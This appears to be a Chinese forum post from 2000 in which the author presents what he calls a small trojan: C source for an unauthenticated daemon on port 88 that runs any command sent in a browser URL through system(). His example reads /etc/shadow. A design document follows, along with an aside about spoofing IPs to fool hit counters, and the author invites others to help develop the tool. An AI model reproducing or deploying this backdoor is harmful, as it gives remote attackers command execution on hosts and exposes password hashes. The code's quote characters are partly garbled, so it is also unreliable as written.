[email protected]
以下的程序算是一个小小的木马吧,设计目的是通过浏览器来控制远程UNIX系统。比如输入 http://192.168.0.111:88/cat /etc/shadow 就能在浏览器里看到 /etc/shadow 的内容。目前也就这些可以,比如 ls 等只有输出的命令好使,象 vi 这样的交互式程序就有些麻烦了。不过只要弄熟悉了 UNIX 及 HTTP 的细节应该问题不大的。我在这里帖出源代码,只能算是一个想法的初步实现而已,希望有兴趣的人和我一起开发,是个练手的好机会啊!
/*
* Author: bobdai
* Email :
[email protected]
* Homepage: http://bobdai.126.com
*
* Jun 15, 2000
*/
#include
#include
#include
#include
#include
#define SA struct sockaddr
main()
{
int n, listenfd, connfd;
char rbuf[1024], wbuf[1024], cbuf[256], *str;
FILE *fp;
struct sockaddr_in servaddr;
if( (listenfd=socket(AF_INET, SOCK_STREAM, 0)) <0 )
perror( ""socket"" ), exit(0);
bzero( &servaddr, sizeof(servaddr) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl( INADDR_ANY );
servaddr.sin_port = htons( 88 );
if( bind(listenfd, (SA *)&servaddr, sizeof(servaddr)) <0 )
perror( ""bind"" ), exit(0);
if( listen(listenfd, 10) <0 )
perror( ""listen"" ), exit(0);
for(;;)
{
bzero( cbuf, 256 );
bzero( wbuf, 1024);
if( (connfd=accept(listenfd, (SA *)NULL, NULL)) <0 )
perror( ""accept"" ), exit(0);
if( read(connfd, rbuf, 1024) <0 )
perror( ""read"" ), exit(0);
if( (fp=fopen(""~~~tempfile~~~"", ""w"")) == NULL)
perror( ""open tempfile error""), exit(0);
fclose( fp );
str = strstr( rbuf, ""GET /"" );
str += 5;
for( n=0; *str != '' ''; n++ )
{
if( *str == ''%'' )
{
str += 3;
*(cbuf+n) = '' '';
}
else *(cbuf+n)=*(str++);
}
strcat( cbuf, "">~~~tempfile~~~"" );
printf( ""%s
"", cbuf );
system( cbuf );
if( (fp=fopen(""~~~tempfile~~~"", ""r"")) == NULL)
perror( ""open tempfile error""), exit(0);
strcpy( wbuf, ""Result:
"" );
if( write(connfd, wbuf, strlen(wbuf)) <0 )
perror( ""write"" ), exit(0);
fgets( wbuf, 1000, fp );
while( !feof(fp) )
{
strcat( wbuf, ""
"" );
if( write(connfd, wbuf, strlen(wbuf)) <0 )
perror( ""write"" ), exit(0);
fgets( wbuf, 1000, fp );
}
fclose( fp );
unlink( ""~~~tempfile~~~"" );
close( connfd );
}
}
cnc 开发文档
bobdai
2000 年 6 月 18 日
一、把程序做成什么样子
1、思路。程序是运行在宿主机上的一个守护进程,通过某个 TCP 端口接受发来的系统命令,并执行这些命令,然后将结果输出到客户端。
2、客户端界面。为了简化客户端程序的编写及使用的方便性,采用浏览器作为客户端。将浏览器分为两个框架(frame),下面的框架为输入部分,可由普通文本框、文本编辑框来实现;上面的框架为输出部分,cnc 的运行结果输出到这里。
3、要完成的基本功能。能够执行所有的非交互式命令。比如,ls、cd、cc、man 等命令我们可以视为非交互式命令,而 vi 这种命令就视为交互式命令,因为在执行过程中他需要控制终端的输入。如果要迁就 vi 来写一个通过浏览器与之交互,无论是编程还是使用都不方便的。所以我想将 vi 的编辑功能用浏览器来实现。先在浏览器的文本编辑框里编好输入内容在上传。
二、技术准备
1、HTTP(1.1) 协议分析( 参考:NetXray 监视 HTTP 的运行,RFC2068 )
Request
浏览器通过 Request 来告诉服务器需要什么东西。打开 NetXray ,在浏览器里输入 http://192.168.0.111/aaa.html ,观察 NetXray 截获到的数据可以看到,首先是 TCP 三路握手,问完“吃了吗”,浏览器就向服务器发请求了。我们看看这个请求是怎么发的。TCP 头部紧接着就是 HTTP 的头部了。HTTP 的头部各字段并非定长的,以 0d 0a 来标志结束。这是 TCP 头部紧接的第一个头部字段:47 45 54 20 2f 61 61 61 2e 68 74 6d 6c 20 48 54 54 50 2f 31 2e 31 0d 0a,翻译过来就是:GET /aaa.html HTTP/1.1 。以后还有 ACCEPT、HOST 等字段。知道了这个,我们就在浏览器里添加一个输入框看看输入框的内容是怎么 submit 到服务器的。我们使用“POST”类型的 form :
看看 HTTP request 是什么样的,第一个字段变成了:50 4f 53 54 20 2f 61 61 61 2e 68 74 6d 6c 20 48 54 54 50 2f 31 2e 31 0d 0a,即:POST /aaa.html HTTP/1.1 。POST 的数据放到了 HTTP 头部后的数据区中,HTTP 头部的结束标志是:0d 0a 0d 0a 。在数据区,我们可以看到:74 31 3d 61 64 73 66 61 73 64 66 61 73 64 66 61,即:t1=adsfasdfasdfa,这就是我们通过输入框 t1 POST 过去的数据。
题外话:通过对 HTTP 头部的分析,又产生了一个欺骗计数器的想法:以伪造的 IP 地址向计数器放置地发 HTTP 的 request,呵呵,看看那些蠢货计数器们如何对付!
Response
由于直接向浏览器 write HTML 页面就能在浏览器上显示,所以先不做 Response 的分析。
框架(frame)的处理分析。
老办法,写个页面来测试一下,用 NetXray 做分析。a.htm:
可以看到,在服务器将 a.htm 传送给浏览器以后,浏览器立即向服务器发送请求要求得到 b.htm 和 c.htm 。我们可以根据这一处理特性,将需要输出的数据根据浏览器的请求分别发送给不同的框架。
2、UNIX 上命令的执行
... ...(续)
???今日问题 ???
输出窗口的刷新问题
描述:输出窗口应该做成向上滚动刷新的方式,就象一般聊天室的做法。
目前没有很好的想法来解决这个问题,请高手指点。
另:工具 NetXray 下载。
2000 年 6 月 19 日
三、程序的总体结构
1、结构图
2、模块
HTTP 协议分析模块 ( http.c )
int http_ana( u_char *buf_in, char *buf_cmd, char *buf_data );
输入:u_char *buf_in,收到的整个客户端数据(可能有多个 HTTP 协议包)。
输出:char *buf_cmd,文本输入框输入的命令
char *buf_data,文本编辑框输入的数据
函数返回负数表示出错,出错码待定。
int http_in( u_char *buf_in );
无输入
输出:u_char *buf_in,客户端一次 POST 发送来的所有 HTTP 包的组合。
函数返回负数表示出错,出错码待定。
服务器端命令解释模块 ( cmd.c )
int execute_cmd( char *buf_cmd );
输入:char* buf_cmd,客户端命令
描述:如果是非交互式命令,执行后输出到客户端;交互式命令目前仅考虑对 vi 的支持,但要考虑到加入别的支持的良好扩展性,调用函数 int execute_vi() 来执行 vi 命令的处理。函数返回负数表示出错,出错码待定。
int execute_vi( char *buf_cmd );
输入:char* buf_cmd,客户端命令
描述:对 vi 的处理我们需要客户端输入的命令里带有要编辑的文件名作为参数,可以带多个文件名。对每一个文件名做如下处理:如果当前目录下有这个文件,则读出文件内容到编辑缓冲区,否则置空编辑缓冲区;刷新客户端的输入框架,使之变成带一个文本编辑器的 form ,编辑缓冲区的内容传递给文本编辑器;等待用户编辑送出编辑后数据到编辑缓冲区;将编辑缓冲区内容存入指定文件。函数返回负数表示出错,出错码待定。
浏览器端脚本模块
命令记忆 类似于 doskey 的东西
浏览器输出框架的动态刷新 实现类似于一般聊天室的输出刷新功能。
由于我对浏览器端脚本的编写不是很熟悉,不知道这两个功能是否能在浏览器上实现,万望高手指点。这里是我作的浏览器端的界面,希望有人能在其基础上给我加入需要的功能,多谢了。
总控模块 ( cnc.c )
void main()
初始化 socket 端口,初始化浏览器端界面,等待浏览器的命令。
另注
注意将各个模块里自定义的函数定义成 static ,避免冲突。